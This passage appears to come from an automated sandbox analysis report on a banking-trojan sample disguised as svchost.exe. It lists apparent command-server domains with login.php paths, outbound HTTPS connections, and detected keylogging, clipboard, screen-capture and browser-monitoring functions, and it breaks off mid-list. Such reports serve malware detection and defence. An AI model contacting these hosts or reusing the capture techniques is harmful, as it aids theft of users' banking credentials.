Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykat.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykuc.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379940773.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375028226.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380116523.00000000033EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypim.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqoc.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqoc.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqyt.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347033417.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrif.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyzuf.com/login.php
Source: svchost.exe, svchost.exe, 00000002.00000003.2349422845.0000000003337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2484846545.00000000093FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384682570.0000000000862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192798228.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341821696.000000000087E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2426275041.00000000093D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428810000.0000000009339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2872175124.00000000093D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197190467.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438909828.0000000004002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311814961.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2498561281.00000000093DA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485001954.000000000403F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.000000000087D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609596121.0000000004038000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341822099.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2288141655.0000000009241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212594747.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2710896493.00000000093D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.2424064037.00000000093D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327976875.000000000938D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2916136120.000000000085D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184929209.0000000003398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663819296.000000000405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2498726255.0000000000866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422101023.000000000086D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2424064037.00000000093CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2313143430.000000000333E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341534976.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2331956208.0000000009381000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2378287344.00000000093D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375586174.000000000333E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2707435720.000000000086B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332355296.0000000009369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327967644.0000000009343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342713570.00000000093BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2872705822.000000000403E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482727801.000000000087E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328466447.0000000009398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2376391418.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt.4
Source: svchost.exe, 00000002.00000003.2376391418.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt?4
Source: svchost.exe, 00000002.00000003.2192798228.0000000003353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtE5
Source: svchost.exe, 00000002.00000003.2665909813.00000000093F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtG?
Source: svchost.exe, 00000002.00000003.2184232088.0000000009274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtI
Source: svchost.exe, 00000002.00000003.2332355296.0000000009364000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359070684.0000000009360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtK6
Source: svchost.exe, 00000002.00000003.2314820342.0000000009323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtQ2
Source: svchost.exe, 00000002.00000003.2341822099.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356574315.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356445392.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtW
Source: svchost.exe, 00000002.00000003.2498726255.0000000000866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384091479.0000000000866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902108476.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtf
Source: svchost.exe, 00000002.00000003.2853017937.0000000000873000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379236460.000000000086F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482727801.0000000000870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtv
Source: svchost.exe, 00000002.00000003.2341822099.00000000033E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comty
Source: svchost.exe, 00000002.00000003.3279033707.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2343646996.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310750407.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2291219253.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346790386.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347416587.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2637865779.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2343198568.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ampproject.org
Source: svchost.exe, 00000002.00000003.3279033707.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396716330.000000000411C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2637865779.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279365565.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2223831199.0000000003399000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 00000002.00000003.2426886771.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2843240617.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502971875.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2880338954.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744698720.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513007291.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2291219253.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2287542216.0000000003348000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2288644022.0000000003349000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607940447.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425973075.0000000004044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481852889.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413265981.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279237129.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413922889.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.2223016601.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279033707.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252903965.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386863203.0000000009307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384098860.0000000004069000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192798228.0000000003351000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2843240617.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212594747.0000000003351000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387314869.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513007291.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400329976.0000000004065000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202891284.0000000009304000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322843013.00000000008D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: unknownNetwork traffic detected: HTTP traffic on port 54645 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54647 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54664 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
Source: unknownNetwork traffic detected: HTTP traffic on port 52120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59249
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52120
Source: unknownNetwork traffic detected: HTTP traffic on port 54680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54680
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 54701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54664
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
Source: unknownNetwork traffic detected: HTTP traffic on port 59249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54647
Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54645
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59248
Source: unknownNetwork traffic detected: HTTP traffic on port 52171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54645 version: TLS 1.2
Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.6:54647 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54664 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:54680 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:54701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:52120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:52171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:50210 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:59249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.6:59248 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Windows\apppatch\svchost.exeCode function: [tab]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: [ins]2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C81E60 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,2_2_02C81E60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C78630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_02C78630
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01248630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_01248630
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01048630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_01048630
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A28630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_00A28630
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C93950 GetDesktopWindow,GetWindowDC,CreateCompatibleDC,PathAddBackslashA,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,WriteFile,ReleaseDC,2_2_02C93950
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C81B80 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,2_2_02C81B80

E-Banking Fraud

barindex
Checks if browser processes are running
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,G